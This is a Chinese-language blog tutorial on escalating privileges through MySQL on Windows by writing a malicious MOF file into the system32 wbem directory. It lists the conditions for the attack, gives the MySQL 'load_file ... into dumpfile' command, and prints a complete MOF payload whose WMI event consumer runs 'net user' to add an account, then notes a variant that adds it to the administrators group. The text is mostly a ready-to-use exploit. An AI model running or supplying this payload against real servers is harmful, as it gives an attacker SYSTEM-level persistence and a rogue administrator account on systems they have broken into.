Mysql-mof提权
0x00 mof提权原理
类似于之前的udf提权,参考https://blog.csdn.net/qq_53577336/article/details/119700116
另外一种mysql提权方式叫做mof提权
在windows系统下 (在c:/windows/system32/wbem/ mof /nullevt. mof)存在一个mof文件,他的特点是,每个极短一段时间,便会以system权限自动运行文件内脚本,mof提权就是将我们写好的mof文件导入到该目录该文件里门,让他自行执行我们的语句,达到我们想要的效果
0x01 提权条件
1)获取到对方mysql的shell,或者是获取到mysql账号密码,能够调用mysql语句
2)目录可写入
对方mysql具有insert和delete权限,也就是可写可删除添加能够创建目录,写入文件
验证是否可写:
show global variables like 'secure%';
如果secure_file_priv值为空则可写,为指定路劲则是指定路劲可写,需要全部可写需要在mysql.ini配置文件添加语句:即可
secure_file_priv=
secure_file_priv是限制函数在哪个目录下拥有上传或者读取文件的权限
0x02 提权exp
利用MySQL将文件写入目录
select load_file('mof文件路径') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
#pragma namespace(“\\\\.\\root\\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user secist 123 /add\”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
执行完毕替换net user hsy 123456 /add换为
net localgroup administrators hsy/add 即可将用户提升管理员权限
交流学习:
博客:http://www.kxsy.work
CSND社区:告白热
Mysql-mof提权相关推荐
- mysql mof_关于mysql mof提权研究
无意中看到有关mysql的这种提权方式,趁着有空余时间便研究了起来,发现网上有挺多地方写的不够详细的,研究的时候也卡壳了一段时间. 利用前提:操作系统为windows 操作系统版本不宜太高,2008测 ...
- mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权
WEB安全第六章提权篇12 mof提权 1.mof是什么 托管对象格式 (MOF) 文件是创建和注册提供程序.事件类别和事件的简便方法.在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译.编 ...
- 113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 1.mof提权原理: 2.mof提权限制: 3.mof提权过程: (1)实验环境: (2)靶机链接: (3)实验 ...
- mysql mof提权原理_mof提权原理及实现
关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的c ...
- mysql mof提权原理_mof提权原理及其过程
mof提权的原理: mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就 ...
- mysql mof提权_MySQL_MOF提权
一.原理 Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件: 将MOF文件执行为命令行参数及Mofcomp.exe文件 使用IMofCompiler接口和 ...
- mysql mof提权原理_Mof提权科普
首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -. 不多说了~.~像名称一样哈~ 首先呢是朋友扔我一shell 他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql. ...
- mysql mof提权原理_关于mysql mof提权研究
无意中看到有关mysql的这种提权方式,趁着有空余时间便研究了起来,发现网上有挺多地方写的不够详细的,研究的时候也卡壳了一段时间. 利用前提:操作系统为windows 操作系统版本不宜太高,2008测 ...
- mysql mof提权_MySQL提权之mof提权
mof提权原理 关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次 ...
- mysql mof提权_三、mysql 之mof提权学习
一.测试环境 win2003 + phpnow 二.使用条件 mysql + root权限 三.工具准备 (1)工具1: 准备好mof提权脚本(具体mof脚本,已上传网盘) (2)工具2: 准备好菜刀 ...
最新文章
- 如何优雅地展示机器学习项目!
- Server 对象 错误 'ASP 0177 : 800401f3' Server.CreateObject 失败解决方案
- python算法与数据结构-顺序表(39)
- Pandas数据结构简介
- HBase的BulkLoad详解
- iPhone 12/13正面对比图曝光:祖传大刘海终于有所改变
- 演讲《云图,让阅读更精彩(Better Cloudary™, Better Reading)》
- 一年之后 重温旧“梦”
- asp.net 用正则表达式过滤内容中的电话,qq,email
- 新手建网站笔记(四)--快捷键
- Python 标准库 —— urllib(下载进度)
- 文荣:7月24日阿里云上海峰会网络大神
- 二级c语言考试改卷标准,计算机二级c语言考试技巧
- power automate desktop获取股票网页数据
- 刀片服务器显示如何切换,刀片机服务器切换
- 小米动态图标+android实现,创新设计动态图标
- Redis 实战指南
- MeasureSpec类
- 基于OCR的身份证要素提取-2019
- 清理xcode模拟器_mac太卡,清除xcode和模拟器缓存